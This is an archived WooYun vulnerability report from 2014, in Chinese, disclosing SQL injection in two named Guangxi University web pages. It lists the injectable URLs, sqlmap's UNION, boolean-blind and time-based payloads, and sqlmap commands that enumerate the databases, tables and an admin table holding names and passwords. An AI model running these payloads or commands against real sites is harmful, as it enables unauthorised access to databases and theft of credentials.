乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-05: 细节已通知厂商并且等待厂商处理中 2014-06-10: 厂商已经主动忽略漏洞,细节向公众公开
广西大学某分站#Mysql Injection(1-2)
Mysql Injection地址:第一处:
http://whsz.gxu.edu.cn/index.php/Index/view?id=361
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=361 AND 8181=8181 Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: id=-5136 UNION ALL SELECT NULL,CONCAT(0x7178776771,0x54665155534f6965754b,0x7168677771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---
第二处:
http://mi.gxu.edu.cn/content.php?id=1343
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1343 AND 8249=8249 Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: id=-5225 UNION ALL SELECT NULL,NULL,CONCAT(0x7164706671,0x564f4661466b4e525479,0x7168616271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1343 AND SLEEP(5)---
第一处:#1、获取数据库:
sqlmap -u http://whsz.gxu.edu.cn/index.php/Index/view?id=361 --dbs
available databases [2]: [*] information_schema[*] whsz
#2、获取表段:
sqlmap -u http://whsz.gxu.edu.cn/index.php/Index/view?id=361 -D whsz --tables
Database: whsz [4 tables]+------------------------+| human_admin || human_article_article || human_article_category || human_visit_log |+------------------------+
#3、获取字段:
sqlmap -u http://whsz.gxu.edu.cn/index.php/Index/view?id=361 -D whsz -T human_admin --columns
Database: whsz Table: human_admin[7 columns]+----------+--------------+| Column | Type |+----------+--------------+| addDate | datetime || id | int(11) || ifDel | tinyint(1) || isSuper | tinyint(1) || name | varchar(100) || password | varchar(255) || trueName | varchar(30) |+----------+--------------+
第二处:#1、获取数据库:
sqlmap -u http://mi.gxu.edu.cn/content.php?id=1343 --dbs
available databases [2]:[*] information_schema[*] sxxy
sqlmap -u http://mi.gxu.edu.cn/content.php?id=1343 -D sxxy --tables
Database: sxxy[31 tables]+--------------------+| section || user || admin || config || friend_admin || friend_book || friend_user || inner_news || inner_newsnews || jifang || message || msg_mo || netpb_addonarticle || netpb_admin || netpb_admintype || netpb_archives || netpb_arcrank || netpb_arctype || netpb_area || netpb_channeltype || netpb_error || netpb_guestbook || netpb_homepageset || netpb_keywords || netpb_member || netpb_member_info || netpb_memberstow || netpb_pbconfig || netpb_plus || news || sharedfiles |+--------------------+
:)
危害等级:无影响厂商忽略
忽略时间:2014-06-10 10:39
暂无